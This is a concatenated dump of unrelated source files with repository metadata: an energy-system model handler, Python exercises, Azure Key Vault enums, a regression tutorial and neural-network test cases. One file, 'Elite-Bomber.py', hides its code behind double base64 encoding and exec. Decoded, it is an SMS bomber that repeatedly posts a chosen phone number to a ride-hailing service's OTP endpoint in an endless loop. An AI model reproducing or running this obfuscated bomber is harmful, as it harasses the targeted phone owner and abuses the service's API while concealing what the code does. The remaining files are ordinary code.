esdl.ProfileElement.python_class.__repr__ = lambda x: 'ProfileElement ({})'.format(EnergySystemHandler.attr_to_dict(x))
# load the ESDL file
resource = rset.get_resource(URI(name))
es = resource.contents[0]
# At this point, the model instance is loaded!
# get notifications of changes in the EnergySystem model
#observer = PrintNotification(es)
#observer2 = PrintNotification(es.instance[0].area)
# also return the esdlm and rset reference, so we can create esdl classes and store them as strings
return es, resource, esdl, rset
# Add Energy System Information
def add_energy_system_information(self):
esi = self.esdl.EnergySystemInformation(id='energy_system_information')
self.es.energySystemInformation = esi
def add_data_source(self, name, description):
data_source = self.esdl.DataSource(id='data_source', name=name, description=description)
self.es.dataSource = data_source
# Add energy system information to the energy system if it is not there yet
# Energy System information can be used to globally define the quantity and units of this system,
# instead of defining them manually per KPI in each area: this fosters reuse (but is not necessary)
def get_quantity_and_units(self):
q_and_u = None
if self.get_by_id('energy_system_information') is None:
self.add_energy_system_information()
q_and_u = self.esdl.QuantityAndUnits(id='quantity_and_units')
self.es.energySystemInformation.quantityAndUnits = q_and_u
else:
q_and_u = self.get_by_id('quantity_and_units')
return q_and_u
# Add KPIs object to Energy System
def add_kpis(self):
# create new KPIs object
kpis = self.esdl.KPIs(id='kpis', description='KPIs')
self.es.instance[0].area.KPIs = kpis
# Add KPI to KPIs object
def add_kpi(self, kpi):
self.es.instance[0].area.KPIs.kpi.append(kpi)
# Get a list of assets of a specific ESDL type in the main instance's area
def get_assets_of_type(self, esdl_type):
assets = []
for current_asset in self.es.instance[0].area.asset:
if isinstance(current_asset, esdl_type):
assets.append(current_asset)
return assets
# Get a list of assets of a specific ESDL type in the specified area
def get_assets_of_type(self, area, esdl_type):
assets = []
for current_asset in area.asset:
if isinstance(current_asset, esdl_type):
assets.append(current_asset)
return assets
# Get a list of potentials of a specific ESDL type in the main instance's area
def get_potentials_of_type(self, esdl_type):
potentials = []
for current_potential in self.es.instance[0].area.potential:
if isinstance(current_potential, esdl_type):
potentials.append(current_potential)
return potentials
# returns a generator of all assets of a specific type. Not only the ones defined in the main Instance's Area
# e.g. QuantityAndUnits can be defined in the KPI of an Area or in the EnergySystemInformation object
# this function returns all of them at once
def get_all_assets_of_type(self, esdl_type):
return esdl_type.allInstances()
# Using this function you can query for objects by ID
# After loading an ESDL-file, all objects that have an ID defines are stored in resource.uuid_dict automatically
# Note: If you add things later to the resource, it won't be added automatically to this dictionary though.
# Use get_by_id_slow() for that
def get_by_id(self, id):
if id in self.resource.uuid_dict:
return self.resource.uuid_dict[id]
else:
return None
# This function iterates over all the contents of the Energy System and is much slower than get_by_id()
def get_by_id_slow(self, id):
for child in self.es.eAllContents():
if hasattr(child, 'id'):
if child.id == id:
return child
# create a readable list of the attributes of an ESDL class
def get_asset_attribute(self, esdl_type, attribute):
asset_data = []
for current_asset in self.es.instance[0].area.asset:
if isinstance(current_asset, esdl_type):
asset_data.append({
'name': current_asset.name, # name
'attribute': {
'key': attribute,
'value': getattr(current_asset, attribute)
}
})
return asset_data
# create a readable list of the attributes of an ESDL class
# (scoped to a specific area)
def get_asset_attribute(self, area, esdl_type, attribute):
asset_data = []
for current_asset in area.asset:
if isinstance(current_asset, esdl_type):
asset_data.append({
'name': current_asset.name, # name
'attribute': {
'key': attribute,
'value': getattr(current_asset, attribute)
}
})
return asset_data
# returns a specific KPI by id, see also get_by_id for a faster method
def get_kpi_by_id(self, id):
for kpi in self.es.instance[0].area.KPIs.kpi:
if kpi.id == id:
return kpi
# returns a specific KPI by name
def get_kpi_by_name(self, name):
for kpi in self.es.instance[0].area.KPIs.kpi:
if kpi.name == name:
return kpi
# save the resource
def save(self, filename):
uri = URI(filename)
fileresource = self.rset.create_resource(uri)
# add the current energy system
fileresource.append(self.es)
# save the resource
fileresource.save()
# get the energy system as a XML String
# does not change the 'active' resource
# so save() will still save as a file
def get_as_string(self):
# to use strings as resources, we simulate a string as being a file
uri = StringURI('anyname.esdl')
# create the string resource
#stringresource = self.rset.create_resource(uri)
# add the current energy system
#stringresource.append(self.es)
# save the resource
self.resource.save(uri)
# remove the temporary resource in the resource set
#self.rset.remove_resource(stringresource)
# return the string
return uri.getvalue()
# load an EnergySystem from a string (using UTF-8 encoding)
def load_from_string(self, string):
uri = StringURI('loadfromstring', string)
# this overrides the current loaded resource
self.resource = self.rset.create_resource(uri)
self.resource.load()
self.es = self.resource.contents[0]
return self.es
class PrintNotification(EObserver):
def __init__(self, notifier=None):
super().__init__(notifier=notifier)
def notifyChanged(self, notification):
print('Notification: {}'.format(notification))
class StringURI(URI):
def __init__(self, uri, text=None):
super(StringURI, self).__init__(uri)
if text is not None:
self.__stream = BytesIO(text.encode('UTF-8'))
def getvalue(self):
readbytes = self.__stream.getvalue()
# somehow stringIO does not work, so we use BytesIO
string = readbytes.decode('UTF-8')
return string
def create_instream(self):
return self.__stream
def create_outstream(self):
self.__stream = BytesIO()
return self.__stream
|
[
"roos.dekok@quintel.com"
] |
roos.dekok@quintel.com
|
ec7d8801eb56e020fb0729328407ae930c6a369e
|
221be51c2ef661a717e7f4740c25e6247c7f2794
|
/0x0A-python-inheritance/0-lookup.py
|
cd819065692d2e44cfd8d7d23aaa0d9abe825d76
|
[] |
no_license
|
Teslothorcha/holbertonschool-higher_level_programming
|
8bc562bf872554dfb5074562dae719663e983722
|
0464d980b45e3164c470dced81192d6ccc926ff7
|
refs/heads/master
| 2020-07-23T00:49:43.809183
| 2020-02-13T21:45:18
| 2020-02-13T21:45:18
| 207,387,971
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
#!/usr/bin/python3
"""
This function will
show the attributes and
methods of an object
"""
def lookup(obj):
"""
obj is the instance to be avaluated
"""
l = []
l = dir(obj)
return l
|
[
"juandavidmarinbernal@gmail.com"
] |
juandavidmarinbernal@gmail.com
|
c2a502a083d53447c9a984a29cbc9702459721c9
|
847233f9b8b837b5c95c63d66b1a42d513444267
|
/Homework3/Homework3-2/ReadData.py
|
f0da6742329a4810ee2531adfa80077d4cd90dd7
|
[] |
no_license
|
bao-bao/DataMining
|
0099da967e0fde93e8ae0d0727b61f1d88990c6d
|
91970aaf8cd1d9c16e55db29ea2f22966c1deead
|
refs/heads/master
| 2020-05-24T19:42:01.306665
| 2017-06-19T19:57:07
| 2017-06-19T19:57:07
| 84,875,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 752
|
py
|
"""
Created by AMXPC on 2017/4/27.
"""
import pandas as pd
def readcsv_notime(x):
dataframe = pd.read_csv(x)
dic = dict()
for index, row in dataframe.iterrows():
if row[1] not in dic:
dic[row[1]] = []
if row[47] not in dic[row[1]]:
dic[row[1]].append(row[47])
# print dic
return dic
def readcsv_withtime(x):
dataframe = pd.read_csv(x)
dic = dict()
time = ''
for index, row in dataframe.iterrows():
if row[1] not in dic:
dic[row[1]] = []
if row[0] != time:
dic[row[1]].append([])
if row[47] not in dic[row[1]][-1]:
dic[row[1]][-1].append(str(row[47]))
time = row[0]
# print dic
return dic
|
[
"1452765@tongji.edu.cn"
] |
1452765@tongji.edu.cn
|
9110b0f1aaee562bca123db9c057b18564d4574b
|
fca45d0b019591bee60506b34f3efe6c83d3d2e7
|
/learn/模块/wk_08_模块的搜索顺序.py
|
57a12fce54f536a3aac7f000deec7ef9eb1ef252
|
[] |
no_license
|
xiebohust/python_study
|
a064ccd1c2fcf88b89ffe6eba1e67a910b90941d
|
43c9c21c0957725fd68db2c9dc296be145816b7a
|
refs/heads/master
| 2020-04-17T14:43:42.608303
| 2019-01-22T11:36:41
| 2019-01-22T11:36:41
| 166,669,118
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 92
|
py
|
import random
rand = random.randint(0, 10)
print(rand)
print(random.__file__)
|
[
"623270307@qq.com"
] |
623270307@qq.com
|
d79b62eac7915e330f408e3821843222f83295f6
|
d7016f69993570a1c55974582cda899ff70907ec
|
/sdk/keyvault/azure-keyvault-administration/azure/keyvault/administration/_generated/v7_4_preview_1/models/_key_vault_client_enums.py
|
2a5527ff22fa10564ce52b1980eeb181bcf14611
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] |
permissive
|
kurtzeborn/azure-sdk-for-python
|
51ca636ad26ca51bc0c9e6865332781787e6f882
|
b23e71b289c71f179b9cf9b8c75b1922833a542a
|
refs/heads/main
| 2023-03-21T14:19:50.299852
| 2023-02-15T13:30:47
| 2023-02-15T13:30:47
| 157,927,277
| 0
| 0
|
MIT
| 2022-07-19T08:05:23
| 2018-11-16T22:15:30
|
Python
|
UTF-8
|
Python
| false
| false
| 5,259
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum
from azure.core import CaseInsensitiveEnumMeta
class DataAction(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""Supported permissions for data actions."""
#: Read HSM key metadata.
READ_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/read/action"
#: Update an HSM key.
WRITE_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/write/action"
#: Read deleted HSM key.
READ_DELETED_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/deletedKeys/read/action"
#: Recover deleted HSM key.
RECOVER_DELETED_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/deletedKeys/recover/action"
#: Backup HSM keys.
BACKUP_HSM_KEYS = "Microsoft.KeyVault/managedHsm/keys/backup/action"
#: Restore HSM keys.
RESTORE_HSM_KEYS = "Microsoft.KeyVault/managedHsm/keys/restore/action"
#: Delete role assignment.
DELETE_ROLE_ASSIGNMENT = "Microsoft.KeyVault/managedHsm/roleAssignments/delete/action"
#: Get role assignment.
GET_ROLE_ASSIGNMENT = "Microsoft.KeyVault/managedHsm/roleAssignments/read/action"
#: Create or update role assignment.
WRITE_ROLE_ASSIGNMENT = "Microsoft.KeyVault/managedHsm/roleAssignments/write/action"
#: Get role definition.
READ_ROLE_DEFINITION = "Microsoft.KeyVault/managedHsm/roleDefinitions/read/action"
#: Create or update role definition.
WRITE_ROLE_DEFINITION = "Microsoft.KeyVault/managedHsm/roleDefinitions/write/action"
#: Delete role definition.
DELETE_ROLE_DEFINITION = "Microsoft.KeyVault/managedHsm/roleDefinitions/delete/action"
#: Encrypt using an HSM key.
ENCRYPT_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/encrypt/action"
#: Decrypt using an HSM key.
DECRYPT_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/decrypt/action"
#: Wrap using an HSM key.
WRAP_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/wrap/action"
#: Unwrap using an HSM key.
UNWRAP_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/unwrap/action"
#: Sign using an HSM key.
SIGN_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/sign/action"
#: Verify using an HSM key.
VERIFY_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/verify/action"
#: Create an HSM key.
CREATE_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/create"
#: Delete an HSM key.
DELETE_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/delete"
#: Export an HSM key.
EXPORT_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/export/action"
#: Release an HSM key using Secure Key Release.
RELEASE_KEY = "Microsoft.KeyVault/managedHsm/keys/release/action"
#: Import an HSM key.
IMPORT_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/import/action"
#: Purge a deleted HSM key.
PURGE_DELETED_HSM_KEY = "Microsoft.KeyVault/managedHsm/keys/deletedKeys/delete"
#: Download an HSM security domain.
DOWNLOAD_HSM_SECURITY_DOMAIN = "Microsoft.KeyVault/managedHsm/securitydomain/download/action"
#: Check status of HSM security domain download.
DOWNLOAD_HSM_SECURITY_DOMAIN_STATUS = "Microsoft.KeyVault/managedHsm/securitydomain/download/read"
#: Upload an HSM security domain.
UPLOAD_HSM_SECURITY_DOMAIN = "Microsoft.KeyVault/managedHsm/securitydomain/upload/action"
#: Check the status of the HSM security domain exchange file.
READ_HSM_SECURITY_DOMAIN_STATUS = "Microsoft.KeyVault/managedHsm/securitydomain/upload/read"
#: Download an HSM security domain transfer key.
READ_HSM_SECURITY_DOMAIN_TRANSFER_KEY = "Microsoft.KeyVault/managedHsm/securitydomain/transferkey/read"
#: Start an HSM backup.
START_HSM_BACKUP = "Microsoft.KeyVault/managedHsm/backup/start/action"
#: Start an HSM restore.
START_HSM_RESTORE = "Microsoft.KeyVault/managedHsm/restore/start/action"
#: Read an HSM backup status.
READ_HSM_BACKUP_STATUS = "Microsoft.KeyVault/managedHsm/backup/status/action"
#: Read an HSM restore status.
READ_HSM_RESTORE_STATUS = "Microsoft.KeyVault/managedHsm/restore/status/action"
#: Generate random numbers.
RANDOM_NUMBERS_GENERATE = "Microsoft.KeyVault/managedHsm/rng/action"
class RoleDefinitionType(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""The role definition type."""
MICROSOFT_AUTHORIZATION_ROLE_DEFINITIONS = "Microsoft.Authorization/roleDefinitions"
class RoleScope(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""The role scope."""
#: Global scope
GLOBAL = "/"
#: Keys scope
KEYS = "/keys"
class RoleType(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""The role type."""
#: Built in role.
BUILT_IN_ROLE = "AKVBuiltInRole"
#: Custom role.
CUSTOM_ROLE = "CustomRole"
class SettingTypeEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):
"""The type specifier of the value."""
BOOLEAN = "boolean"
|
[
"noreply@github.com"
] |
kurtzeborn.noreply@github.com
|
ac91c2db1ba24f2cb5f837094d410a4de6971e15
|
dbf3509d667dd72e1f80a967d8e08d7c03da5201
|
/Elite-Bomber.py
|
a4bec44815735ef65203ac5e1a22ffeaefa4c715
|
[] |
no_license
|
TERMUX20210/EliteBomber-1
|
e3f3bafd5fdd503628a1212480e3836d3f130c5b
|
86a6b26af8453f21139aa38c8afd27875097e67a
|
refs/heads/main
| 2023-03-29T07:52:17.833651
| 2021-03-30T21:12:59
| 2021-03-30T21:12:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,250
|
py
|
import base64
exec(base64.b64decode('''aW1wb3J0IGJhc2U2NAp4PSgiYVcxd2IzSjBJSEpsY1hWbGMzUnpDbWx0Y0c5eWRDQnZjd3B5WldR
OUoxd3dNek5iTXpGdEp3cG5jbVZsYmowblhEQXpNMXN6TW0wbkNtSnNkV1U5SjF3d016TmJNelp0
Sndwd2FXNXJQU2RjTURNeld6TTFiU2NLY21GdVp6MG5YREF6TTFzek5HMG5DbXhwYm1zZ1BTQWlh
SFIwY0hNNkx5OWhjSEF1YzI1aGNIQXVkR0Y0YVM5aGNHa3ZZWEJwTFhCaGMzTmxibWRsY2kxdllY
VjBhQzkyTWk5dmRIQWlDbTl6TG5ONWMzUmxiU2dpWm05eUlHa2dhVzRnZXpFdUxqRXlmVHNnWkc4
Z1ptOXlJR29nYVc0Z0pDaHpaWEVnTVNBa2FTazdJR1J2SUdWamFHOGdMVzVsSUNScHc0UGlnSlFr
YWowa0tDaHBLbW9wS1Z4Y2REdGtiMjVsT3lCbFkyaHZPMlJ2Ym1VaUtRcHZjeTV6ZVhOMFpXMG9J
bU5zWldGeUlpa0tjSEpwYm5Rb1ppSjdjbVZrZlNBaUtRcHdjbWx1ZENnaUlDQWdJQ0FnSUNBc0lD
QWdJQ0JjSUNBZ0lDOGdJQ0FnSUNBc0lDSXBDbkJ5YVc1MEtDSWdJQ0FnSUNBZ0x5QmNJQ0FnSUNs
Y1gxOHZLQ0FnSUNBZ0x5QmNJQ0lwQ25CeWFXNTBLQ0lnSUNBZ0lDQXZJQ0FnWENBZ0tGOWNJQ0F2
WHlrZ0lDQXZJQ0FnWENBaUtRcHdjbWx1ZENnaUlGOWZYMTh2WDE5ZlgxOWNYMTljUUNBZ1FDOWZY
MTh2WDE5ZlgxOWNYMTlmWHlBaUtRcHdjbWx1ZENnaWZDQWdJQ0FnSUNBZ0lDQWdJQ0I4WEM0dUwz
d2dJQ0FnSUNBZ0lDQWdJQ0FnSUh3Z0lpa0tjSEpwYm5Rb0lud2dJQ0FnSUNBZ0lDQWdJQ0FnSUZ4
V1ZpOGdJQ0FnSUNBZ0lDQWdJQ0FnSUNCOElDSXBDbkJ5YVc1MEtDSjhJQ0FnSUNBZ0lDQlFaWEp6
YVdGdUlFVnNhWFJsSUNCWlZDQWdJQ0FnSUNBZ2ZDQWlLUXB3Y21sdWRDZ2lmRjlmWDE5ZlgxOWZY
MTlmWDE5ZlgxOWZYMTlmWDE5ZlgxOWZYMTlmWDE5Zlgzd2dJaWtLY0hKcGJuUW9JaUI4SUNBZ0lD
OWNJQzhnSUNBZ0lDQmNYQ0FnSUNBZ0lDQWdYQ0F2WENBZ0lDQjhJQ0lwQ25CeWFXNTBLQ0lnZkNB
Z0x5QWdJRllnSUNBZ0lDQWdLU2tnSUNBZ0lDQWdJRllnSUNCY0lDQjhJQ0lwQ25CeWFXNTBLQ0ln
ZkM4Z0lDQWdJTUt3SUNBZ0lDQWdJQzh2SUNBZ0lDQWdJQ0RDc0NBZ0lDQWdYSHdnSWlrS2NISnBi
blFvSWlEQ3NDQWdJQ0FnSUNBZ0lDQWdJQ0FnVmlBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0RDc0NBaUtR
cHdjbWx1ZENobUludHdhVzVyZlNBaUtRcHdjbWx1ZENnaTRvaUd6cURPb002Z3pxRE9vTTZnenFE
T29NNmd6cURPb002Z3pxRE9vTTZnenFET29NNmd6cURPb002Z3pxRE9vTTZnenFET29NNmd6cURP
b002Z3pxRE9vTTZnNG9pR0lpa0tjSEpwYm5Rb1ppSjdZbXgxWlgwZ0lpa0tjSEpwYm5Rb0lsUmxi
R1ZuY21GdElEb2dRRkJsY25OcFlXNWZSV3hwZEdVaUtRcHdjbWx1ZENnaVdXOTFWSFZpWlNBZ09p
QlpiM1ZVZFdKbExtTnZiUzlRWlhKemFXRnVSV3hwZEdVaUtRcHdjbWx1ZENobUludHdhVzVyZlNB
aUtRcHdjbWx1ZENnaTRvaUd6cURPb002Z3pxRE9vTTZnenFET29NNmd6cURPb002Z3pxRE9vTTZn
enFET29NNmd6cURPb002Z3pxRE9vTTZnenFET29NNmd6cURPb002Z3pxRE9vTTZnNG9pR0lpa0tj
SEpwYm5Rb1ppSjdaM0psWlc1OUlDSXBDbkJ5YVc1MEtDSjhNWHhGYkdsMFpVSnZiV0lpS1Fwd2Nt
bHVkQ2dpZkRKOFZHVnpkRTVsZENJcENuQnlhVzUwS0NKOE0zeEZlR2wwSWlrS2NISnBiblFvWmlK
N2NtRnVaMzBnSWlrS1JXeHBkR1VnUFNCcGJuUW9hVzV3ZFhRb0luemlpSVo4WTJodmIzTmxJRHcr
UGlBNklDSXBLUXBwWmlCRmJHbDBaU0E5UFNBeE9nb2dJQ0FnYm5WdFltVnlJRDBnYVc1d2RYUW9J
bkJzWldGelpTQnpaVzVrSUc1MWJXSmxjaUI3T2NPWHc1ZkRsOE9YdzVmRGw4T1hmU0E2SUNJcENp
QWdJQ0IzYUdsc1pTQlVjblZsT2dvZ0lDQWdJQ0FnSUNBZ0lDQWdJSEpsY1hWbGMzUnpMbkJ2YzNR
b2JHbHVheXhrWVhSaFBYc2lZMlZzYkhCb2IyNWxJam9pS3prNElpdHVkVzFpWlhKOUtRb2dJQ0Fn
SUNBZ0lDQWdJQ0FnSUhCeWFXNTBLQ0pUZFdOalpYTnpablZzYkhrZ2MyVnVaR1ZrSWl3Z2JuVnRZ
bVZ5S1FwbGJHbG1JRVZzYVhSbElEMDlJRE02Q2lBZ0lDQnZjeTV6ZVhOMFpXMG9JbU5zWldGeUlp
a0tJQ0FnSUc5ekxuTjVjM1JsYlNnaVptbG5iR1YwSUZCbGNuTnBZVzVGYkdsMFpTQWlLUXBsYkds
bUlFVnNhWFJsSUQwOUlESTZDaUFnSUNCdmN5NXplWE4wWlcwb0ltTnNaV0Z5SWlrS0lDQWdJRzl6
TG5ONWMzUmxiU2dpY0dsd0lHbHVjM1JoYkd3Z2MzQmxaV1IwWlhOMExXTnNhU0lwQ2lBZ0lDQnZj
eTV6ZVhOMFpXMG9Jbk53WldWa2RHVnpkQzFqYkdraUtRcGxiR2xtSUVWc2FYUmxJRDA5SURRNkNp
QWdJQ0J2Y3k1emVYTjBaVzBvSW5SbGJHNWxkQ0IwYjNkbGJDNWliR2x1YTJWdWJHbG5hSFJ6TG01
c0lpa0siKQpleGVjKGJhc2U2NC5iNjRkZWNvZGUoeCkpCg=='''))
|
[
"noreply@github.com"
] |
TERMUX20210.noreply@github.com
|
bbc257704347d7f441fdbee899a6469c903d2547
|
09df89395816834ddf77de620f959c22e74d8c00
|
/two pointer/4sum.py
|
b718a7fe2a55d01a2998c1b012d6f980712976b4
|
[] |
no_license
|
gdh756462786/Leetcode_by_python
|
c853c4e3de255a8b4016c59944a0d40213a539a7
|
6387543a2a23c30aef1d5d37db54ca72cfb19270
|
refs/heads/master
| 2020-06-22T11:53:24.758506
| 2018-12-28T03:03:31
| 2018-12-28T03:03:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,728
|
py
|
#coding: utf-8
'''
Given an array S of n integers, are there elements a, b, c,
and d in S such that a + b + c + d = target?
Find all unique quadruplets in the array
which gives the sum of target.
Note: The solution set must not contain duplicate quadruplets.
For example, given array S = [1, 0, -1, 0, -2, 2], and target = 0.
A solution set is:
[
[-1, 0, 0, 1],
[-2, -1, 1, 2],
[-2, 0, 0, 2]
]
'''
class Solution(object):
def fourSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[List[int]]
"""
nums.sort()
res = []
length = len(nums)
for i in xrange(0, length - 3):
if i and nums[i] == nums[i-1]:
continue
for j in xrange(i+1, length - 2):
if j != i + 1 and nums[j] == nums[j - 1]:
continue
sum = target - nums[i] - nums[j]
left, right = j + 1, length - 1
while left < right:
if nums[left] + nums[right] == sum:
res.append([nums[i], nums[j],
nums[left], nums[right]])
right -= 1
left += 1
while left < right and nums[left] == nums[left-1]:
left += 1
while left < right and nums[right] == nums[right+1]:
right -= 1
elif nums[left] + nums[right] > sum:
right -= 1
else:
left += 1
return res
solution = Solution()
print solution.fourSum([1,0,-1,0,-2,2], 0)
|
[
"pengshuang92@163.com"
] |
pengshuang92@163.com
|
75084d5f50d30f264bd62819aa2a3de04acf7d31
|
852f1b6cc06ac01845b37d78e842d19b74922056
|
/Regression/polynomial_linear_regression.py
|
e47dd22df892708890143a41f3d115bf56c6ed95
|
[] |
no_license
|
Ankur800/AI-Udemy
|
be8abbfb5ee1273dca1b98720f2ffdd7d55794b6
|
06ef7a6dc4909b45b913f934100319d3da0f0ff1
|
refs/heads/master
| 2022-12-19T08:28:11.900582
| 2020-09-27T11:27:37
| 2020-09-27T11:27:37
| 298,285,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,034
|
py
|
# IMPORTING THE LIBRARIES
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# IMPORTING DATASET
dataset = pd.read_csv("/home/ankur/Udemy ML/Machine Learning A-Z (Codes and Datasets)/Part 2 - Regression/Section 6 - Polynomial Regression/Python/Position_Salaries.csv")
X = dataset.iloc[:, 1:-1].values
y = dataset.iloc[:, -1].values
# -----NOTE-----
# here, we want to make our prediction good, so we'll not divide dataset as
# training and testing part, so no SPLITTING step
# TRAINING THE LINEAR REGRESSION MODEL ON WHOLE DATASET
from sklearn.linear_model import LinearRegression
lin_reg = LinearRegression()
lin_reg.fit(X, y)
# TRAINING THE POLYNOMIAL REGRESSION ON THE WHOLE DATASET
from sklearn.preprocessing import PolynomialFeatures
poly_reg = PolynomialFeatures(degree=4) # degree means 'n' in b0 + b1*x1 + b2*(x1)^2 + ... + bn*(x1)^n
X_poly = poly_reg.fit_transform(X)
lin_reg_2 = LinearRegression()
lin_reg_2.fit(X_poly, y)
# VISUALISING LINEAR REGRESSION RESULTS
plt.scatter(X, y, color='red')
plt.plot(X, lin_reg.predict(X), color='blue')
plt.title('Truth or Bluff (Linear Regression)')
plt.xlabel('Position Level')
plt.ylabel('Salary')
plt.show()
# VISUALISING POLYNOMIAL REGRESSION RESULTS
plt.scatter(X, y, color='red')
plt.plot(X, lin_reg_2.predict(poly_reg.fit_transform(X)), color='blue')
plt.title('Truth or Bluff (Polynomial Regression)')
plt.xlabel('Position Level')
plt.ylabel('Salary')
plt.show()
# VISUALISING POLYNOMIAL REGRESSION RESULTS (for higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.1)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color='red')
plt.plot(X_grid, lin_reg_2.predict(poly_reg.fit_transform(X_grid)), color='blue')
plt.title('Truth or Bluff (Polynomial Regression)')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show()
# PREDICTING A NEW RESULT WITH LINEAR REGRESSION
print(lin_reg.predict([[6.5]]))
# PREDICTING A NEW RESULT WITH LINEAR REGRESSION
print(lin_reg_2.predict(poly_reg.fit_transform([[6.5]])))
|
[
"ankurrai800@gmail.com"
] |
ankurrai800@gmail.com
|
61aff27c1371eae56c95e28fd996301b43fce1db
|
e6404513b30d5f274ca0d18af26e40d73f38cc28
|
/2带有一个隐藏层的平面数据分类/testCases.py
|
779e0b66f682754658341e39a90f8e6c8c77814b
|
[] |
no_license
|
MrVBian/deplearning.ai
|
b5c2c0b9def932e12ae2909ccca561edcd7cf34d
|
e935793a866837ab752c99aeb486bcaf4ce7311f
|
refs/heads/master
| 2020-12-23T02:24:07.667931
| 2020-02-01T08:24:30
| 2020-02-01T08:24:30
| 237,004,481
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,034
|
py
|
#-*- coding: UTF-8 -*-
"""
# WANGZHE12
"""
import numpy as np
def layer_sizes_test_case():
np.random.seed(1)
X_assess = np.random.randn(5, 3)
Y_assess = np.random.randn(2, 3)
return X_assess, Y_assess
def initialize_parameters_test_case():
n_x, n_h, n_y = 2, 4, 1
return n_x, n_h, n_y
def forward_propagation_test_case():
np.random.seed(1)
X_assess = np.random.randn(2, 3)
parameters = {'W1': np.array([[-0.00416758, -0.00056267],
[-0.02136196, 0.01640271],
[-0.01793436, -0.00841747],
[ 0.00502881, -0.01245288]]),
'W2': np.array([[-0.01057952, -0.00909008, 0.00551454, 0.02292208]]),
'b1': np.array([[ 0.],
[ 0.],
[ 0.],
[ 0.]]),
'b2': np.array([[ 0.]])}
return X_assess, parameters
def compute_cost_test_case():
np.random.seed(1)
Y_assess = np.random.randn(1, 3)
parameters = {'W1': np.array([[-0.00416758, -0.00056267],
[-0.02136196, 0.01640271],
[-0.01793436, -0.00841747],
[ 0.00502881, -0.01245288]]),
'W2': np.array([[-0.01057952, -0.00909008, 0.00551454, 0.02292208]]),
'b1': np.array([[ 0.],
[ 0.],
[ 0.],
[ 0.]]),
'b2': np.array([[ 0.]])}
a2 = (np.array([[ 0.5002307 , 0.49985831, 0.50023963]]))
return a2, Y_assess, parameters
def backward_propagation_test_case():
np.random.seed(1)
X_assess = np.random.randn(2, 3)
Y_assess = np.random.randn(1, 3)
parameters = {'W1': np.array([[-0.00416758, -0.00056267],
[-0.02136196, 0.01640271],
[-0.01793436, -0.00841747],
[ 0.00502881, -0.01245288]]),
'W2': np.array([[-0.01057952, -0.00909008, 0.00551454, 0.02292208]]),
'b1': np.array([[ 0.],
[ 0.],
[ 0.],
[ 0.]]),
'b2': np.array([[ 0.]])}
cache = {'A1': np.array([[-0.00616578, 0.0020626 , 0.00349619],
[-0.05225116, 0.02725659, -0.02646251],
[-0.02009721, 0.0036869 , 0.02883756],
[ 0.02152675, -0.01385234, 0.02599885]]),
'A2': np.array([[ 0.5002307 , 0.49985831, 0.50023963]]),
'Z1': np.array([[-0.00616586, 0.0020626 , 0.0034962 ],
[-0.05229879, 0.02726335, -0.02646869],
[-0.02009991, 0.00368692, 0.02884556],
[ 0.02153007, -0.01385322, 0.02600471]]),
'Z2': np.array([[ 0.00092281, -0.00056678, 0.00095853]])}
return parameters, cache, X_assess, Y_assess
def update_parameters_test_case():
parameters = {'W1': np.array([[-0.00615039, 0.0169021 ],
[-0.02311792, 0.03137121],
[-0.0169217 , -0.01752545],
[ 0.00935436, -0.05018221]]),
'W2': np.array([[-0.0104319 , -0.04019007, 0.01607211, 0.04440255]]),
'b1': np.array([[ -8.97523455e-07],
[ 8.15562092e-06],
[ 6.04810633e-07],
[ -2.54560700e-06]]),
'b2': np.array([[ 9.14954378e-05]])}
grads = {'dW1': np.array([[ 0.00023322, -0.00205423],
[ 0.00082222, -0.00700776],
[-0.00031831, 0.0028636 ],
[-0.00092857, 0.00809933]]),
'dW2': np.array([[ -1.75740039e-05, 3.70231337e-03, -1.25683095e-03,
-2.55715317e-03]]),
'db1': np.array([[ 1.05570087e-07],
[ -3.81814487e-06],
[ -1.90155145e-07],
[ 5.46467802e-07]]),
'db2': np.array([[ -1.08923140e-05]])}
return parameters, grads
def nn_model_test_case():
np.random.seed(1)
X_assess = np.random.randn(2, 3)
Y_assess = np.random.randn(1, 3)
return X_assess, Y_assess
def predict_test_case():
np.random.seed(1)
X_assess = np.random.randn(2, 3)
parameters = {'W1': np.array([[-0.00615039, 0.0169021 ],
[-0.02311792, 0.03137121],
[-0.0169217 , -0.01752545],
[ 0.00935436, -0.05018221]]),
